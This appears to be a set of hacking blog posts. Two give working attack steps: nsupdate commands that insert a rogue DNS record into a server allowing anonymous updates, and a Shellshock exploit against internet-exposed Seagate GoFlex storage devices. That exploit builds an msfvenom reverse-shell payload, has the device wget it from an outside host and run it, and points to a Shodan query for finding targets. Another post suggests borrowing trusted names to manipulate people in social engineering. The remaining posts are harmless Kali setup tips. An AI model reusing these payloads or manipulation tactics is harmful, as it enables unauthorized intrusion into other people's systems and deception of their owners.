Exploiting CVE-1999-0184 DNS Poisoning

Yes this CVE is old, but I keep seeing it and there is no real tool or exploit guides available so I thought I would make one up right quick.

This "guide" is for Kali 2 and the basics of whats going on is the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If its not already on your system you can just run apt.

apt-get install dnsutils

Now we will need to start with a file that has all our commands in it. It should look something like this:

server 1.2.3.4 #our target DNS server 

zone corp.company.com #the zone we are working in. 

update delete evil.corp.company.com. A #rm just in case. 

update add evil.corp.company.com. 86400 IN A 2.2.2.2 

show 

send

Save the file as dns. Now just run the following command:

nsupdate -v dns

nsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:

Outgoing update query:

;; ->>HEADER<<- i="" id:="" nbsp="" noerror="" opcode:="" status:="" update="">

;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0

;; ZONE SECTION:

;corp.company.com. IN SOA

;; UPDATE SECTION:

evil.corp.company.com. 0 ANY A

evil.corp.company.com. 86400 IN A 2.2.2.2

Now just run a quick DiG query to make sure it worked.

dig @1.2.3.4 A evil.corp.company.com 

That is all I have for this post. Happy hacking :)

Using famous fake names

A while ago I was at a stl2600 meeting and the topic was using fake identities of famous people for online services and events IRL as a way to protect your real identity and be easy to remember for you. They gave a number of great examples and even links to sites to help come up with the fake ID.

To expand on that idea I suggested there might be a social engineering impact if you choose your alias wisely. Like using the name from a positive supporting character in a movie, people might be more likely not to question you, and even allow you privileges they might not other wise presumably because they associate you with this character subconsciously.

The reason I suggest using a support character and not a main one is because people are more likely to have better recall of a leading character, the idea is to use a name that is linked to positive feelings that someone cant quite put their finger on, hopefully allowing that feeling of trust to be lent to anyone with that name or ones that sound similar.

Under a more targeted social engineering attack you might use the name of a favorite sibling, or relative. Yes the target will pick up on this right away but hopefully the years of trust the target associates with the ID you choose will be lent to you with out the target knowing they are doing so. Results will vary of course. What are your thoughts? Have you done something like this and it worked? Tells us about it.

Getting a remote shell on any one of 68,000+ Seagate GoFlex devices

I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to shellshock but getting a remote shell was no easy task "for me anyway". I ended up having to build a payload with msfvenom and doing the execution using burp suite and handling the shell with metasploit handler. The best part is this device uses UPNP to tunnel to the Internet, giving us easy access >;)

Start with the payload:

msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt

Now upload msf.txt to your web server. After the payload is uploaded open metasploit and

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
run 

That should start up our listener. Now we need to open up burp and use the repeater. Enter the following for the request:

GET /support/ HTTP/1.1

Host: 5.6.7.8

User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Also don't forget to configure the target correctly. Hit go and wait a few seconds and you should see some wget output and if all went well you should now have uploaded msf.php to the /tmp/ dir of the device. Now we just need to execute it. For this we use burp again. This time put this in the request:

GET /support/ HTTP/1.1

Host: 5.6.7.8

User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

This time when you hit Go, and your ports are forwarded correctly, you should be able to go back to our msfconsole window and see a session has opened.  You wont have root at this point but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share :) Enjoy!

*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it but you could try to use linux/x86/exec payload in bash bug exploit module to deploy and execute. This would allow you to keep it all in metasploit.

Kali 2 and MATE windows manager

When I first installed K2 in a vm it ran ungodly slow. It of course was GNOME eating resources like a hog so I decided to use something a little lighter. After some messing around I settled on MATE.

Install MATE:

apt-get install mate-desktop-environment-core

To set it as system default windows manager use this command

echo mate-session > /root/.xsession

Now just reboot and log back in. You should be dumped to the mate desktop and your Kali install should be running much smoother :)

Kali 2 and OpenVPN without network manager

So I am not a big fan of the network manager UI for openvpn and normally opt for the cli setup. In Kali 2 the old /etc/init.d/openvpn start and service openvpn start didn't seam to work. For a quick work around I cam up with the below bash script. I hope you can get use of it.

**NOTE: Dump all your certs and config file in /etc/openvpn and have resolv.conf in /root/

#!/bin/sh
cd /etc/openvpn/
rm /etc/resolv.conf
cp /root/resolv.conf /etc/
openvpn --config vpn-server.conf & # edit vpn-server.conf to what ever your config file is named.


Contents of resolv.conf

nameserver 8.8.8.8
nameserver 8.8.4.4


If anyone knows a better way to do this in Kali 2 please let me know. :)